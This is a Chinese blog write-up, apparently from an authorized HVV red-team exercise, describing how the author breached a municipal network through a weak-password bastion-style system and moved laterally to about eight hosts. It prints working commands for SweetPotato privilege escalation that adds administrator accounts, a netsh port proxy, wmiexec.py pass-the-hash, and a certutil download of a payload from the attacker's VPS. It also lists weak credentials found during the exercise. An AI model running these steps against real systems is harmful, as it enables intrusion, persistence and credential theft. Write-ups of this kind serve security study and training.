HVV实战-一次有意思的打点突破

admin 2024年2月7日23:09:36评论27 views1字数 3608阅读12分1秒阅读模式

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0X00 前言

      记录之前一次地市级HVV实战经历,本次打点比较特殊,不像之前利用一些中间件RCE,历史漏洞,或者文件上传,sql注入拿权限,本次是通过找到一个C段地址的一个端口,发现是一个类似堡垒机的web系统,然后通过阅读操作手册,配置网络进入内网。

0X01 实战过程

1.http://xx.xxxx.xx.x:5000/console/default.asp,弱口令admin,123456登录系统,对该系统进行常规测试,发现上传点无法上传,sql注入也无法利用,本来打算溜溜球的,结果在http://xx.xxxx.xx.x:80端口也发现一个登录口,这个登录口没爆破出账号,但是发现存在一个操作手册下载,下载打开后发现好像是个类似堡垒机的东西,瞬间热血上涌,感觉到了进入内网的希望。

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

2. 下载了帮助文档发现是个类似云桌面管理的系统,还有客户端下载,下载安装之后发现需要配置网关,然后使用账号密码登录,在5000端口下发现了账号密码,密码默认为111111。

HVV实战-一次有意思的打点突破

3.这里选了用户1,密码111111,这样连接肯定是连不上的,看了下选项需要配置网关,但是默认网关是内网地址10.xxx.xxx.63:5000

HVV实战-一次有意思的打点突破

 4.突然想到这个后台还有个网络映射的功能,哈哈哈,那我直接把该网关地址映射到公网地址的5000端口不就行了,事实证明确实可以,成功登录进去,然后在一个电脑图标处发现一个桌面,直接点击进入内网一台主机桌面,幸福来得太突然了。

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

4.上传一些利用工具到C:UsersPublicDownloads,使用fscan扫描10.152.0.0/16192.168.0.0/16网段,整理出扫描结果

HVV实战-一次有意思的打点突破

----------SSH----------

[+] SSH:192.xx.2.2:22:root root

----------mysql----------

[+] mysql:10.xx.xx.80:3306:root 123456

----------mssql----------

[+] mssql:10.xx.xx.237:1433:sa Aa123456

[+] mssql:10.xx.xx.152:1433:sa 11111111

----------poc----------

[+] http://10.xx.xx.77:8000 poc-yaml-jboss-unauth

[+] http://10.xx.xx.80:8085 poc-yaml-druid-monitor-unauth

[+] http://10.xx.xx.19:8000 poc-yaml-jboss-unauth

5.使用frpc.exe进行内网穿透,开启socks5代理:vps:7002,然后使用本机提权工具将10.xxx.xx.237和10.xx.xx.152进行提权,上传提权工具SweetPotato.exe以及木马文件到服务器10.xx.xx.237目录C:/Users/MSSQLSERVER/Desktop,使用命令:

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net user soutt Sou123 /add"C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net localgroup administrators soutt /add"

6.加管理员账号soutt,soutt2两个账号,远程登录之后使用关闭杀软防护上线CS,提权获取system权限。

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

7.查看到账号密码文件,使用桌面的数据库管理工具可以直接连接oracle数据库 sys:MES123456

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

8.同样的方法,在服务器:10.xxx.xxx.152, C:/Users/MSSQLSERVER/上传adduser.exe添加管理员账号,CXK Aa123456

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

利用JBOSS漏洞上线2台机器管理员权限: 10.xx.xx.77,10.xx.xx.19

Jboss1:10.xx.xx.19:利用Jboss漏洞直接远程添加用户,远程登录成功

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

9.上线cs:

因为不出网,所以在出网服务器10.xxx.xxx.237上传proxy.exe代理工具,代理http代理10.xxx.xxx.237:8080端口上线内网不出网主机

netsh interface portproxy add v4tov4 listenaddress=10.xx.xx.19 listenport=822(一个没使用的端口) connectaddress=web出网的IP(10.xxx.xxx.237) connectport=8080

流量方向

10.xx.xx.19 → 10.xxx.xxx.237:8080C2(vpsIP)

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

上线成功

HVV实战-一次有意思的打点突破

Jboss2:使用未授权漏洞进行部署shell,然后通过冰蝎上传adduser.exe,使用jboss利用工具运行获得远程账号CXK Aa123456

HVV实战-一次有意思的打点突破

C:/temp/adduser.exe

HVV实战-一次有意思的打点突破

添加用户成功远程连接10.xxx.xxx.77

http://10.xxx.xxx.77:8000/test/test.jsp

HVV实战-一次有意思的打点突破

同样的http代理上线cs成功

HVV实战-一次有意思的打点突破

10.使用CS抓取10.x.x.152主机的hash,使用该hash: cce53c7a2f41xxxxxxxf4d3c911875进行pth成功三台主机10.x.x.70,10.x.x.82,10.x.x.149/

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

11.使用wmiexec.py脚本:

python wmiexec.py -hashes 00000000000000000000000000000000: cce53c7a2f41xxxxxxxf4d3c911875 Administrator@10.xxx.x.82

进行上线82主机,方法一样的,3台主机都是火绒,vps开启python远程下载服务,使用该命令绕过下载adduser.exe即可

copy c:windowssystem32certutil.exe a.exea.exe -urlcache -split -f http://vps:9999/add.exe

HVV实战-一次有意思的打点突破

12.下载add.exe执行 远程登录这台机器10.xxx.x.82: CXK$,sum%TFys7q

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

运行添加成功, 10.xxx.x.82: CXK$,sum%TFys7q,然后远程上线cs成功

HVV实战-一次有意思的打点突破

使用wmiexec.py脚本:

python wmiexec.py -hashes 00000000000000000000000000000000: cce53c7a2f41xxxxxxxf4d3c911875 Administrator@10.xxx.x.70

和进行上线70和149主机,同样的方法,上线成功,10.xxx.x.70:CXK Aa123456

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

10.xxx.xx.70:CXK$ GYLMzn5dcL

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

13,上线8台主机,7台管理员权限,一台云桌面,还有一台linux服务器弱口令: 192.168.2.2:22,root,root

HVV实战-一次有意思的打点突破

对获取权限的主机进行htmlhash破解获得明文账号密码如下:

Administrator kxxxx136  10.xxx.x.70   

Administrator xxxx123 10.xxx.xx.77 |149 |82| 152

Administrator Aa123456 10.xx.xx.237

14.远程登录10.xxx.x.237,使用账号密码administrator: xxxx123发现web.config文件,获取到10.xxx.x.172的mssql数据库账号密码sa,xxx123!@#

HVV实战-一次有意思的打点突破

15.生成社工密码文件,使用fscan对10.xxx.x.0/24网段进行爆破,爆破出10.xxx.x.152的redis密码xx123456,10.xx.xx.81的mssql用户密码:sa,xxxxx123

HVV实战-一次有意思的打点突破

16.获得2台msssql服务器权限,和之前提权方式一样,这里不多写了,继续使用获得的密码特征生成特征库,生成密码: xx123!@# , xxx123456,爆破1433端口获得数据库10.xx.x.5 sa kh123!@#,10.xx.x.74 sa kh123!@#,10.xxx.x.19 sa 123456,这里直接利用工具和上述一直获取权限,就不上cs了

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

HVV实战-一次有意思的打点突破

17.一共获得的数据库如下:

HVV实战-一次有意思的打点突破

0X03 总结

    本次主要是工作组环境,多拿机器,多拿数据库,然后刷分就好了,中间的过程其实都是基本操作。

原文始发于微信公众号(夜安团队SEC):HVV实战-一次有意思的打点突破

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月7日23:09:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HVV实战-一次有意思的打点突破http://cn-sec.com/archives/2475442.html

发表评论

匿名网友 填写信息